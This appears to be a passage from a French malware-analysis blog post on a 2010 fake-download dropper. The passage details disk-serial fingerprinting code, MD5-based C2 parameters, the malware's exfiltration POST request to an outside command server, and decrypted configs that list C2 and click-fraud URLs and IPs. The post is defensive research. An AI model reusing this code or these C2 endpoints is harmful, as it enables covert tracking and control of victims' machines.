&lt;address&gt;&lt;font size=&quot;1&quot; face=&quot;courier new,courier,monospace&quot; style=&quot;color: #960000;&quot;&gt;16265 | 62.212.66.81&amp;#160; | 62.212.64.0/19&amp;#160; | NL | ripencc&amp;#160; | 2000-06-22 | LEASEWEB LEASEWEB AS&lt;/font&gt;&lt;/address&gt; 
&lt;address&gt;&lt;font size=&quot;1&quot; face=&quot;courier new,courier,monospace&quot; style=&quot;color: #960000;&quot;&gt;16265 | 62.212.66.108 | 62.212.64.0/19&amp;#160; | NL | ripencc&amp;#160; | 2000-06-22 | LEASEWEB LEASEWEB AS&lt;/font&gt;&lt;/address&gt; 
&lt;address&gt;&lt;font size=&quot;1&quot; face=&quot;courier new,courier,monospace&quot; style=&quot;color: #960000;&quot;&gt;21788 | 64.120.141.6&amp;#160; | 64.120.128.0/18 | US | arin&amp;#160;&amp;#160;&amp;#160;&amp;#160; | 2009-04-27 | NOC | Network Operations Center Inc.&lt;/font&gt;&lt;/address&gt; 
&lt;address&gt;&lt;font size=&quot;1&quot; face=&quot;courier new,courier,monospace&quot; style=&quot;color: #960000;&quot;&gt;19318 | 69.10.38.27&amp;#160;&amp;#160; | 69.10.32.0/20&amp;#160;&amp;#160; | US | arin&amp;#160;&amp;#160;&amp;#160;&amp;#160; | 2007-04-11 | NJIIX-AS-1 | NEW JERSEY INTERNATIONAL INTERNET EXCHANGE LLC&lt;/font&gt;&lt;/address&gt;&lt;br /&gt;Chaque programme téléchargé aura sa signature unique car à chaque requête le PE est &amp;quot;&lt;em&gt; tagué &lt;/em&gt;&amp;quot; de plusieurs bytes.&lt;br /&gt;Les noms des fichiers sont générés en fonction de l&#039;url, il s&#039;agit d&#039;une ré-écriture de l&#039;entête:&lt;br /&gt;&lt;br /&gt;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;http://movieutilitesonline.com/&lt;strong&gt;HelloWorld.Keygen.1337.exe&lt;/strong&gt;&lt;br /&gt;-- Content-Disposition: attachment;filename=&lt;strong&gt;HelloWorld.Keygen.1337.exe&lt;/strong&gt;&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;Quant aux packers, de la même manière, les &amp;quot;lots&amp;quot; ont leurs propres caractéristiques.&lt;br /&gt;&lt;br /&gt;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;17/02/2010 21:46:05:57 | MULTIMEDIAPLUGIN.COM | 91 136 | 0000262D | 00001A2D | CODE | 3.4&lt;br /&gt;18/02/2010 00:00:00:01 | MEDIACANOPIES.COM | 91 136 | 0000262D | 00001A2D | CODE | 3.4&lt;/font&gt;&lt;br /&gt;...&lt;br /&gt;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;20/02/2010 22:54:58:04 | FILMUTILITES.COM | 92 672 | 00001F50 | 00001350 | CODE | 3.1&lt;br /&gt;21/02/2010 02:18:44:54 | MEDIAGOSS.COM | 92 672 | 00001F50 | 00001350 | CODE | 3.1&lt;br /&gt;21/02/2010 10:14:33:14 | OMNIGLOBALMEDIA.COM | 92 672 | 00001F50 | 00001350 | CODE | 3.1&lt;br /&gt;21/02/2010 23:11:22:39 | PLAINMULTIMEDIA.COM | 92 672 | 00001F50 | 00001350 | CODE | 3.1&lt;/font&gt;&lt;br /&gt;...&lt;br /&gt;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;22/02/2010 23:48:45:56 | SUPERFILESNOW.COM | 94 208 | 00002449 | 00001849 | .text | 4.1&lt;br /&gt;23/02/2010 09:48:07:21 | MEGAFILESMEDIA.COM | 94 208 | 00002449 | 00001849 | .text | 4.1&lt;/font&gt;&lt;br /&gt;...&lt;br /&gt;&lt;br /&gt; 
&lt;address&gt;Revenons aux échantillons du lot associé au billet de SunbeltBlog.&lt;/address&gt; 
&lt;p&gt;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;10/03/2010 14:58:32:99 | MOVIEUTILITESONLINE.COM | 105 472 | Unknown | 00006B03 | 00005F03 | .text | 2.25&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;Point commun avec les précédents packers, ces fichiers ne peuvent être analysés sous &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=843&amp;amp;entry_id=62&quot;  onmouseover=&quot;window.status=&#039;http://threatexpert.com/report.aspx?md5=e96be4b61064295fe01ac6d87c3190af&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; title=&quot;ThreatExpert failure&quot;&gt;TE&lt;/a&gt;.&lt;br /&gt;Sur cette &lt;a href=&quot;http://mad.internetpol.fr/media/dpk.ogv&quot; target=&quot;_blank&quot; title=&quot;Media: Video - Malware Unpacking&quot;&gt;vidéo&lt;/a&gt; d&#039;unpacking, la première session concerne ce packer et la deuxième ceux des fichiers téléchargés.&lt;br /&gt;Comme la plupart des bestioles, la première étape consiste à récupérer des informations.&lt;br /&gt;&lt;br /&gt;&lt;font size=&quot;1&quot; face=&quot;courier new,courier,monospace&quot;&gt;LCID GetUserDefaultLCID(void);&lt;br /&gt;&lt;br /&gt;BOOL WINAPI GetVolumeInformation(&lt;br /&gt;&amp;#160; __in_opt&amp;#160;&amp;#160; LPCTSTR lpRootPathName,&lt;br /&gt;&amp;#160; __out&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; LPTSTR lpVolumeNameBuffer,&lt;br /&gt;&amp;#160; __in&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; DWORD nVolumeNameSize,&lt;br /&gt;&amp;#160; __out_opt&amp;#160; LPDWORD lpVolumeSerialNumber,&lt;br /&gt;&amp;#160; __out_opt&amp;#160; LPDWORD lpMaximumComponentLength,&lt;br /&gt;&amp;#160; __out_opt&amp;#160; LPDWORD lpFileSystemFlags,&lt;br /&gt;&amp;#160; __out&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; LPTSTR lpFileSystemNameBuffer,&lt;br /&gt;&amp;#160; __in&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; DWORD nFileSystemNameSize&lt;br /&gt;);&lt;br /&gt;&lt;br /&gt;BOOL SHGetSpecialFolderPath(&amp;#160;&amp;#160;&amp;#160;&amp;#160; &amp;#160;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; HWND hwndOwner,&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; LPTSTR lpszPath,&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; int csidl,&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; BOOL fCreate&lt;br /&gt;);&lt;br /&gt;&lt;br /&gt;DWORD WINAPI GetEnvironmentVariable(&lt;br /&gt;&amp;#160; __in_opt&amp;#160;&amp;#160; LPCTSTR lpName,&lt;br /&gt;&amp;#160; __out_opt&amp;#160; LPTSTR lpBuffer,&lt;br /&gt;&amp;#160; __in&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; DWORD nSize&lt;br /&gt;);&lt;br /&gt;&lt;br /&gt;int PathGetDriveNumber(&amp;#160;&amp;#160;&amp;#160;&amp;#160; &amp;#160;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; LPCTSTR lpsz&lt;br /&gt;);&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;etc... je vais juste introduire l&#039;utilisation de &lt;font face=&quot;courier new,courier,monospace&quot;&gt;DeviceIoControl&lt;/font&gt; qui doit ressembler à:&lt;br /&gt;&lt;br /&gt;&lt;font face=&quot;courier new,courier,monospace&quot; style=&quot;color: #05064b;&quot;&gt;HANDLE hPhysicalDriveIOCTL = 0;&lt;br /&gt;hPhysicalDriveIOCTL = CreateFile (&amp;quot;\\\\.\\PhysicalDrive0&amp;quot;, GENERIC_READ | GENERIC_WRITE,&lt;br /&gt;FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);&lt;br /&gt;DeviceIoControl (hPhysicalDriveIOCTL, 0x2D1400, NULL, 0,&lt;br /&gt;&amp;amp; buffer, sizeof (buffer), &amp;amp; cbBytesReturned, NULL);&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;Ce qui permet d&#039;extraire des informations comme:&lt;br /&gt;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;Label: LEET HARDDISK&lt;br /&gt;Version: 1.0&lt;br /&gt;Serial: B00B00B00B00B00B00B00B00B00B00B00B00B00B&lt;br /&gt;Size: 1337&lt;br /&gt;...&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;Ce lot de données est envoyé par la suite dans une requête en méthode &lt;font face=&quot;courier new,courier,monospace&quot;&gt;POST&lt;/font&gt;.&lt;br /&gt;L&#039;identification de la fonction de hachage cryptographique est aisée,&lt;br /&gt;&lt;br /&gt;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;01 23 45 67 89 AB CD EF FE DC BA 98 76 54 32 10&amp;#160;&amp;#160; .#Eg........vT2.&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;Il s&#039;agit tout simplement de &lt;font face=&quot;courier new,courier,monospace&quot;&gt;&lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=845&amp;amp;entry_id=62&quot;  onmouseover=&quot;window.status=&#039;http://fr.wikipedia.org/wiki/MD5&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; title=&quot;MD5&quot;&gt;MD5&lt;/a&gt;&lt;/font&gt;&lt;br /&gt;Lors de mon test, mes informations étaient les suivantes: &amp;quot;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;LEET HARDDISK1.0VB8637c3bf-5c5a0f3e &lt;/font&gt;&amp;quot;&lt;br /&gt;La variable &amp;quot;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;a1&lt;/font&gt;&amp;quot; sera construite ainsi: &amp;quot;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;13371337&lt;/font&gt;&amp;quot; + &amp;quot;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;25fc74d877cd3f05bf460225015ca2b5&lt;/font&gt;&amp;quot;&lt;br /&gt;Ensuite la variable &amp;quot;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;a2&lt;/font&gt;&amp;quot; correspondra à la valeur retournée par la fonction &lt;font face=&quot;courier new,courier,monospace&quot;&gt;GetTickCount&lt;/font&gt;.&lt;br /&gt;Et enfin la variable &amp;quot;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;cd&lt;/font&gt;&amp;quot; utilisera des chaines &lt;font face=&quot;courier new,courier,monospace&quot;&gt;ASCII&lt;/font&gt; hardcodées permettant d&#039;agir comme &amp;quot;&lt;em&gt;horodateur&lt;/em&gt;&amp;quot;.&lt;br /&gt;Au final, nous obtenons quelque chose sous la forme:&lt;br /&gt;&lt;br /&gt;&amp;quot;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;a2=0000b0a6&amp;amp;a1=1337133725fc74d877cd3f05bf460225015ca2b5&amp;amp;cd=Mar&amp;#160; 9 2010,12:55:55&lt;/font&gt;&amp;quot;&lt;br /&gt;&lt;br /&gt;D&#039;autres informations sont ainsi récupérées, cryptées et encodées en base64 puis envoyées aux pirates.&lt;br /&gt;Ci-dessous, une démonstration détaillée des étapes successives. &lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://mad.internetpol.fr/imgupz/26d82173440dd3cd1ddc6ac2074ce021.png&quot; target=&quot;_blank&quot; title=&quot;ZooM ++&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://mad.internetpol.fr/imgupz/26d82173440dd3cd1ddc6ac2074ce021.png&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Le programme va ensuite décoder ses DNS hardcodés, en général au nombre de 3, ici:&lt;br /&gt;&lt;br /&gt;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;- ANGELHOUSEARTS.COM&lt;br /&gt;- BESTHOMEARTS.COM&lt;br /&gt;- SUPERSTYLEMEDIA.COM&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;Puis va concatèner toutes ces informations et forger les futures requêtes.&lt;br /&gt;Noms de domaines, noms de pages, noms de variables sont déterminés dans le binaire.&lt;br /&gt;La méthode &lt;strong&gt;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;POST&lt;/font&gt;&lt;/strong&gt; sera toujours utilisée, de même pour le &lt;font face=&quot;courier new,courier,monospace&quot;&gt;User-Agent&lt;/font&gt; défini à &amp;quot;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;wget 3.0&lt;/font&gt;&amp;quot;&lt;br /&gt;Si une anomalie a été détectée alors la valeur de &amp;quot;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;Content-Type&lt;/font&gt;&amp;quot; sera erronée:&lt;br /&gt;Exemple: &amp;quot;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;Content-Type: application/x-www-form-urlen&lt;span style=&quot;color: #960000;&quot;&gt;q&lt;/span&gt;oded&lt;/font&gt;&amp;quot;&lt;br /&gt;Ce qui permet ainsi d&#039;invalider la requête, malin...&lt;br /&gt;&lt;br /&gt;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;[+] wininet.InternetCrackUrlA&lt;br /&gt;&amp;#160;&amp;#160; &amp;#160;---- WS2_32&lt;br /&gt;&amp;#160;&amp;#160; &amp;#160;+ WSAStartup&lt;br /&gt;&amp;#160;&amp;#160; &amp;#160;+ gethostbyname&lt;br /&gt;&amp;#160;&amp;#160; &amp;#160;+ socket&lt;br /&gt;&amp;#160;&amp;#160; &amp;#160;+ ntohs&lt;br /&gt;&amp;#160;&amp;#160; &amp;#160;+ connect&lt;br /&gt;&amp;#160;&amp;#160; &amp;#160;+ getsockopt&lt;br /&gt;&amp;#160;&amp;#160; &amp;#160;+ send&lt;br /&gt;&amp;#160;&amp;#160; &amp;#160;+ recv&lt;br /&gt;&amp;#160;&amp;#160; &amp;#160;+ closesocket&lt;br /&gt;&amp;#160;&amp;#160; &amp;#160;+ WSACleanup &lt;/font&gt;&lt;br /&gt;&lt;br /&gt;&lt;font size=&quot;1&quot; face=&quot;arial,helvetica,sans-serif&quot;&gt;&lt;strong&gt;POST&lt;/strong&gt; /mnhbckjmdhckj.php?&lt;strong&gt;q&lt;/strong&gt;=...&lt;br /&gt;Content-Type: &lt;strong&gt;application/x-www-form-urlencoded&lt;/strong&gt;&lt;br /&gt;Host: besthomearts.com&lt;br /&gt;&lt;strong&gt;User-Agent: wget 3.0&lt;/strong&gt;&lt;br /&gt;Content-Length: 121&lt;br /&gt;Connection: close&lt;br /&gt;Cache-Control: no-cache&lt;br /&gt;&lt;strong&gt;data&lt;/strong&gt;=...&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;Pour résumer, la première variable de l&#039;url contiendra les valeurs des variables (&amp;quot;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;a1&lt;/font&gt;&amp;quot;+&amp;quot;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;a2&lt;/font&gt;&amp;quot;+&amp;quot;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;cd&lt;/font&gt;&amp;quot;) tandis que la variable &amp;quot;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;data&lt;/font&gt;&amp;quot; contiendra les valeurs des variables (&amp;quot;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;debug&lt;/font&gt;&amp;quot;+&amp;quot;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;admin&lt;/font&gt;&amp;quot;+&amp;quot;&lt;font face=&quot;arial,helvetica,sans-serif&quot;&gt;os&lt;/font&gt;&amp;quot;). La réponse du serveur distant correspond à un fichier de configuration XML crypté.&lt;br /&gt;&lt;br /&gt;&lt;a title=&quot;ZooM ++&quot; target=&quot;_blank&quot; href=&quot;http://mad.internetpol.fr/imgupz/5705291132859d3724625e557549f7e6.png&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://mad.internetpol.fr/imgupz/5705291132859d3724625e557549f7e6.png&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Il faut imaginer que toutes ces actions sont réalisées sur une machine moderne en l&#039;espace d&#039;une fraction de seconde. En utilisant ce fichier d&#039;échange crypté, les pirates peuvent contourner une grande variété de solutions de filtrages et ensuite piloter vos ordinateurs. Dans ce cas d&#039;étude, le programme va effectuer une lecture par découpage (&lt;em&gt;parsing&lt;/em&gt;) de la configuration et on observe très clairement que 3 fichiers peu ou pas détectés par vos solutions antivirus. Deux ordinateurs infectés par un même fichier peuvent avoir des infections multiples et symptômes différents. Des &lt;strong&gt;gif&lt;/strong&gt; ? D&#039;après l&#039;entête des fichiers, on pourrait croire qu&#039;effectivement qu&#039;il s&#039;agit d&#039;images valides, en réalité il s&#039;agit de &lt;font face=&quot;courier new,courier,monospace&quot;&gt;PE&lt;/font&gt; cryptés qui seront téléchargés dans le répertoire &lt;font face=&quot;courier new,courier,monospace&quot;&gt;%tmp%&lt;/font&gt;.&lt;br /&gt;&lt;br /&gt;Au moment du test, les fichiers téléchargés étaient:&lt;br /&gt;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;f55c8ea72c66d48934f85f1368e6404c - 154&amp;#160;112 - [HomePacker(Layer(UPX))]&lt;br /&gt;d8ad2ac5204e5d2940308e0fafb73d25 - 162&amp;#160;816 - [HomePacker(Layer(UPX))]&lt;br /&gt;&lt;/font&gt;&lt;br /&gt;Et le fichier &lt;font face=&quot;courier new,courier,monospace&quot;&gt;4c42b50a3d0b216894d497a399f4c1f4&lt;/font&gt; de &lt;font face=&quot;courier new,courier,monospace&quot;&gt;235008&lt;/font&gt; octets qui correspond au dropper.&lt;br /&gt;Quelques mots sur cette librairie, elle commence par décrypter ses chaines de caractères, API et config embarquée.&lt;br /&gt;&lt;u&gt;Note&lt;/u&gt;: Si quelqu&#039;un sait à quoi correspond la chaine ASCII &amp;quot;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;&lt;strong&gt;Canaveral&lt;/strong&gt;&lt;/font&gt;&amp;quot;, contactez-moi, merci.&lt;br /&gt;&lt;br /&gt;&lt;font size=&quot;1&quot; face=&quot;courier new,courier,monospace&quot; style=&quot;color: #338708;&quot;&gt;&amp;lt;zippo&amp;gt;&lt;br /&gt;&amp;#160;&amp;#160; &amp;#160;&amp;lt;url post=&amp;quot;on&amp;quot;&amp;gt;&amp;lt;![CDATA[http://yourgot.com/oms.php]]&amp;gt;&amp;lt;/url&amp;gt;&lt;br /&gt;&amp;#160;&amp;#160; &amp;#160;&amp;lt;url post=&amp;quot;on&amp;quot;&amp;gt;&amp;lt;![CDATA[http://safarel.com/oms.php]]&amp;gt;&amp;lt;/url&amp;gt;&lt;br /&gt;&amp;#160;&amp;#160; &amp;#160;&amp;lt;url crypt=&amp;quot;on&amp;quot; post=&amp;quot;on&amp;quot;&amp;gt;&amp;lt;![CDATA[http://soilness.com/oms.php]]&amp;gt;&amp;lt;/url&amp;gt;&lt;br /&gt;&amp;lt;/zippo&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;gi&amp;gt;&lt;br /&gt;&amp;#160;&amp;#160; &amp;#160;&amp;lt;url get=&amp;quot;on&amp;quot;&amp;gt;&amp;lt;![CDATA[http://proting.com/tbd.php?e=]]&amp;gt;&amp;lt;/url&amp;gt;&lt;br /&gt;&amp;#160;&amp;#160; &amp;#160;&amp;lt;url get=&amp;quot;on&amp;quot;&amp;gt;&amp;lt;![CDATA[http://theour.com/tbd.php?e=]]&amp;gt;&amp;lt;/url&amp;gt;&lt;br /&gt;&amp;#160;&amp;#160; &amp;#160;&amp;lt;url get=&amp;quot;on&amp;quot; crypt=&amp;quot;on&amp;quot;&amp;gt;&amp;lt;![CDATA[http://foralllife.com/tbd.php?e=]]&amp;gt;&amp;lt;/url&amp;gt;&lt;br /&gt;&amp;lt;/gi&amp;gt;&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;Cette fois les requêtes sont effectuées avec &amp;quot;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;User-Agent: XML&lt;/font&gt;&amp;quot;&lt;br /&gt;Les informations cryptés sont stockées dans la base de registre:&lt;br /&gt;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;HKEY_CURRENT_USER\Software\Microsoft\Handle\...&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;Et ça ressemble à ça déchiffré:&lt;br /&gt;&lt;br style=&quot;color: #338708;&quot; /&gt;&lt;font size=&quot;1&quot; face=&quot;courier new,courier,monospace&quot; style=&quot;color: #338708;&quot;&gt;&amp;lt;root&amp;gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; &amp;lt;config&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; &amp;lt;url post=&amp;quot;on&amp;quot;&amp;gt;&amp;lt;![CDATA[http://yourgot.com/oms.php]]&amp;gt;&amp;lt;/url&amp;gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; &amp;lt;url post=&amp;quot;on&amp;quot; crypt=&amp;quot;on&amp;quot;&amp;gt;&amp;lt;![CDATA[http://soilness.com/oms.php]]&amp;gt;&amp;lt;/url&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; &amp;lt;/config&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; &amp;lt;gi&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; &amp;lt;url get=&amp;quot;on&amp;quot;&amp;gt;&amp;lt;![CDATA[http://proting.com/tbd.php?e=]]&amp;gt;&amp;lt;/url&amp;gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; &amp;lt;url get=&amp;quot;on&amp;quot;&amp;gt;&amp;lt;![CDATA[http://theour.com/tbd.php?e=]]&amp;gt;&amp;lt;/url&amp;gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; &amp;lt;url get=&amp;quot;on&amp;quot; crypt=&amp;quot;on&amp;quot;&amp;gt;&amp;lt;![CDATA[http://foralllife.com/tbd.php?e=]]&amp;gt;&amp;lt;/url&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; &amp;lt;searchperday&amp;gt;inf&amp;lt;/searchperday&amp;gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; &amp;lt;clicksperday&amp;gt;inf&amp;lt;/clicksperday&amp;gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; &amp;lt;pause&amp;gt;5&amp;lt;/pause&amp;gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; &amp;lt;/gi&amp;gt;&lt;br /&gt;&amp;lt;/root&amp;gt;&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;Informations sur les DNS associés aux fichiers de configuration.&lt;br /&gt;&lt;/p&gt; 
&lt;address&gt;&lt;font size=&quot;1&quot; face=&quot;courier new,courier,monospace&quot;&gt;DNS (.COM) | AS&amp;#160;&amp;#160;&amp;#160; | IP&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; | BGP Prefix&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; | CC | Registry | Allocated&amp;#160; | AS Name&lt;/font&gt;&lt;/address&gt; 
&lt;address&gt;&lt;font size=&quot;1&quot; face=&quot;courier new,courier,monospace&quot;&gt;&lt;span style=&quot;color: #960000;&quot;&gt;yourgot&amp;#160;&amp;#160;&amp;#160; | 7796&amp;#160; | 216.240.157.88 | 216.240.144.0/20 | US | arin&amp;#160;&amp;#160;&amp;#160;&amp;#160; | 1999-09-22 | ATMLINK - ATMLINK, INC.&lt;/span&gt;&lt;/font&gt;&lt;/address&gt; 
&lt;address&gt;&lt;font size=&quot;1&quot; face=&quot;courier new,courier,monospace&quot;&gt;&lt;span style=&quot;color: #960000;&quot;&gt;safarel&amp;#160;&amp;#160;&amp;#160; | NA&amp;#160;&amp;#160;&amp;#160; | 185.239.210.1&amp;#160; | NA&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; |&amp;#160;&amp;#160;&amp;#160; |&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; |&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; | NA&lt;/span&gt;&lt;/font&gt;&lt;/address&gt; 
&lt;address&gt;&lt;font size=&quot;1&quot; face=&quot;courier new,courier,monospace&quot;&gt;&lt;span style=&quot;color: #960000;&quot;&gt;proting&amp;#160;&amp;#160;&amp;#160; | 36351 | 208.43.125.181 | 208.43.64.0/18&amp;#160;&amp;#160; | US | arin&amp;#160;&amp;#160;&amp;#160;&amp;#160; | 2008-04-22 | SOFTLAYER - SoftLayer Technologies Inc.&lt;/span&gt;&lt;/font&gt;&lt;/address&gt; 
&lt;address&gt;&lt;font size=&quot;1&quot; face=&quot;courier new,courier,monospace&quot;&gt;&lt;span style=&quot;color: #960000;&quot;&gt;theour&amp;#160;&amp;#160;&amp;#160;&amp;#160; | 46636 | 88.214.205.199 | 88.214.192.0/20&amp;#160; | GB | ripencc&amp;#160; | 2006-01-18 | NATCOWEB - NatCoWeb Corp.&lt;/span&gt;&lt;/font&gt;&lt;/address&gt; 
&lt;address&gt;&lt;font size=&quot;1&quot; face=&quot;courier new,courier,monospace&quot;&gt;&lt;span style=&quot;color: #960000;&quot;&gt;foralllife | 34984 | 217.131.120.61 | 217.131.96.0/19&amp;#160; | TR | ripencc&amp;#160; | 2001-01-22 | TELLCOM-AS Tellcom Iletisim Hizmetleri&lt;/span&gt;&lt;/font&gt;&lt;/address&gt; 
&lt;p&gt;... Il y a quantité de choses à détailler et commenter mais pas sûr que &amp;quot;&lt;em&gt;tout le monde&lt;/em&gt;&amp;quot; apprécie.&lt;br /&gt;&lt;/p&gt; 
&lt;p&gt;&lt;u&gt;Rappel:&lt;/u&gt; &lt;a title=&quot;securite-informatique.gouv.fr&quot; target=&quot;_blank&quot; href=&quot;http://mad.internetpol.fr/exit.php?url_id=846&amp;amp;entry_id=62&quot;  onmouseover=&quot;window.status=&#039;http://www.securite-informatique.gouv.fr/autoformations/principes_ssi/co/dixCdt_29.html&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Principes essentiels de la sécurité informatique - Chapitre: &amp;quot;Télécharger prudemment&amp;quot;&lt;/a&gt;&lt;/p&gt; 
&lt;p&gt;Si vous avez un compte Twitter, suivez l&#039;actualité avec nos amis francophones, &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=847&amp;amp;entry_id=62&quot;  onmouseover=&quot;window.status=&#039;https://twitter.com/siri_urz&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; title=&quot;Twitter siri_urz&quot;&gt;@Siri_URZ&lt;/a&gt; ; &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=848&amp;amp;entry_id=62&quot;  onmouseover=&quot;window.status=&#039;https://twitter.com/cedricpernet/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; title=&quot;Twitter cedricpernet&quot;&gt;@CedricPernet&lt;/a&gt; ; &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=849&amp;amp;entry_id=62&quot;  onmouseover=&quot;window.status=&#039;http://twitter.com/nicolasbrulez&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; title=&quot;Twitter nicolasbrulez&quot;&gt;@NicolasBrulez&lt;/a&gt; ; etc... &lt;br /&gt;pour + de contacts: &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=850&amp;amp;entry_id=62&quot;  onmouseover=&quot;window.status=&#039;https://twitter.com/MalwareScene/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return 